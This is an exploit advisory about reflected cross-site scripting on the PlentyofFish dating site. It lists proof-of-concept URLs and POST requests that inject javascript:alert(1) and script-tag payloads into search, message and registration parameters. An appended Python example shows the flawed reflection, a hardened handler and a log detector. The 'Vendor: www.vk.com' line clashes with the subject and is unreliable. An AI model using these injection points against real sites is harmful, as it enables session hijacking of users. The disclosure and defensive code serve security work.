PlentyofFish (POF) Reflected Cross Site Scripting

2013.02.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: PlentyofFish (POF) Cross Site Scripting (Reflected)
# Vendor: www.vk.com
# Author: Juan Carlos García (NightSec)
# Blog: http://hackingmadrid.blogspot.com
# Facebook: http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196

******************* BRIEF DESCRIPTION ******************

PlentyofFish (POF) is an online dating site, popular primarily in Canada, the United Kingdom, Australia, Brazil and the United States. The company, based in Vancouver, British Columbia, generates revenue through advertising. While it is free to use, POF offers premium services as part of their upgraded membership, such as seeing the date and time a user viewed your profile and allowing you to see whether a user read and/or deleted your message. According to Compete.com's site traffic tracking, Plentyoffish attracted 5.3 million visitors in February 2011.

On January 21, 2011, it was discovered that the PlentyofFish website had been hacked, which exposed the personal and password information on nearly 30 million user accounts.[19] Since the alleged hacking incident, Frind alleges he has identified persons he believes are responsible for the hacking, and alleges he is threatening legal action in response to the widespread negative media exposure. At the time this received global media exposure, and security experts blamed PlentyofFish for the security and privacy lapse, specifically for keeping users' passwords unsecured.[19][20]

On February 28, 2012, the parents of US Army Lieutenant Peter Burks sued PlentyofFish. The parents' lawsuit alleges photos of their son, who was killed in Iraq in 2007, were used without permission. The parents are seeking compensatory and punitive damages.

****************** The Flaw ******************

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance.
A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology. When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise. 
******************* Proof Of Concept (PoC) *******************

www.pof.com/es_basicsearch.aspx?iama=javascript:alert(1);&minage=30&maxage=42&z_code=28030&state=1696&city=Madrid&seekinga=f&ethnicity=0&sorting=0&miles=100&country=82&imagesetting=1&page=1&count=600'>

http://www.pof.es/es_basicsearch.aspx?count=229&country=1&ethnicity=13&iama=f&imagesetting=javascript:alert(1);&maxage=35&miles=100&minage=25&page=26&searchtype=1&seekinga=m&sorting=0&starsign=1&state=1&viewtype=0

http://www.pof.es/es_basicsearch.aspx?Profession&cmdSearch=B%C3%BAsqueda&country=1&ethnicity=13&iama=javascript:alert(1);&maxage=35&millas=35&minage=25&save=1&searchtype=1&seekinga=m&starsign=1&state=1&viewtype=0&z_code=+

http://www.pof.es/es_sendmessage.aspx?p_id=50890764&sendto=Silvi76&submit=Enviar!&usersendto=55590685&v=%3Cscript%3Ealert(%22xss%22)%3C/script%3E

POST http://www.pof.es/es_register.aspx?SID=ybbnrf5ur51cmxq5xvuce2es&callbackDomain=http%3A%2F%2Fwww.pof.es
keyval=HACK&Password=HACK&UserName=HACK&Email=HACK&PasswordConfirm=HACK&gender=1&birthday=02&birthmonth=2&birthyear=1994&country=82&ethnicity=2&EmailB=HACK&key=mywvljtf0aafnhlne1ds2ele&rand=34293&bvadoftn=ON&action=RegSubmit&Submit=Go+To+Second+Step&Submit.x=&Submit.y=

POST http://www.pof.es/es_seduction2.aspx
gender=0&meet=1&f1=1&f2=1&f3=1&f4=1&f5=1&f6=1&f7=1&f8=1&f9=1&f10=1&f11=1&desire=2&A1=1&A2=1&A3=1&A4=1&A5=1&A6=1&A7=1&A8=1&A9=1&A10=1&A11=1&A12=1&A13=1&A14=1&A15=1&A16=1&A17=1&A18=1&A19=1&A20=1&A21=1&A22=1&A23=1&A24=1&A25=1&A26=1&A27=1&A28=1&A29=1&A30=1

POST http://www.pof.es/es_register.aspx?SID=w5dkgceq1k2gj30fwf4alfrg&callbackDomain=http%3A%2F%2Fwww.pof.es
dvlhqjh=ZAP&vttgsrp=&PasswordConfirm=&nlqtptai=ZAP&EmailB=ZAP&birthmonth=2&birthday=02&birthyear=1994&gender=1&ethnicity=2&country=82&rand=464591&key=w5dkgceq1k2gj30fwf4alfrg&keyval=ZAP&ohpgfiof=&rand_submit=464591&adnoagd=ON&wool=1&action=RegSubmit&Submit=Go+To+Second+Step&Submit.x=&Submit.y=
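The reflection the PoC URLs above rely on, shown as an added example that is not code from the advisory or from POF: a hypothetical search handler (Python stand-in for the site's ASP.NET page) that echoes the iama parameter into an href and the v parameter into page text, its hardened form (allow-list for the enumerated field, HTML encoding for free text), and a log-side detector that flags request URLs carrying a javascript: scheme or a script tag in any query parameter.

```python
"""Reflected XSS: the echoing pattern behind the PoC, a hardened version,
and a detector for the request URLs listed in the advisory.

Added example, not the site's code. The handler is hypothetical and
assumes `iama` lands in an <a href> and `v` in page text, as the PoC suggests.
"""
import html
from urllib.parse import urlsplit, parse_qs


def render_vulnerable(query: str) -> str:
    """Raw reflection: whatever arrives in iama/v is written into the HTML."""
    q = parse_qs(query, keep_blank_values=True)
    iama = q.get("iama", [""])[0]
    v = q.get("v", [""])[0]
    return f'<a href="{iama}">search</a><p>{v}</p>'


# iama is an enumerated field (m/f in the PoC URLs); anything else is rejected.
ALLOWED_IAMA = {"m", "f"}


def render_hardened(query: str) -> str:
    """Allow-list the enumerated field; entity-encode free text before output."""
    q = parse_qs(query, keep_blank_values=True)
    iama = q.get("iama", [""])[0]
    if iama not in ALLOWED_IAMA:
        iama = ""  # reject rather than reflect an unexpected value
    # quote=True also encodes " and ', so the value is safe inside attributes
    v = html.escape(q.get("v", [""])[0], quote=True)
    return f'<a href="{iama}">search</a><p>{v}</p>'


def suspicious_params(url: str) -> list:
    """Return query parameter names whose (URL-decoded) value carries a
    javascript: scheme or a <script tag. Suitable for scanning access logs."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = []
    for name, values in q.items():
        for val in values:
            low = val.lower().replace(" ", "")
            if low.startswith("javascript:") or "<script" in low:
                hits.append(name)
                break
    return sorted(hits)
```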

References:

http://www.vk.com/
http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196

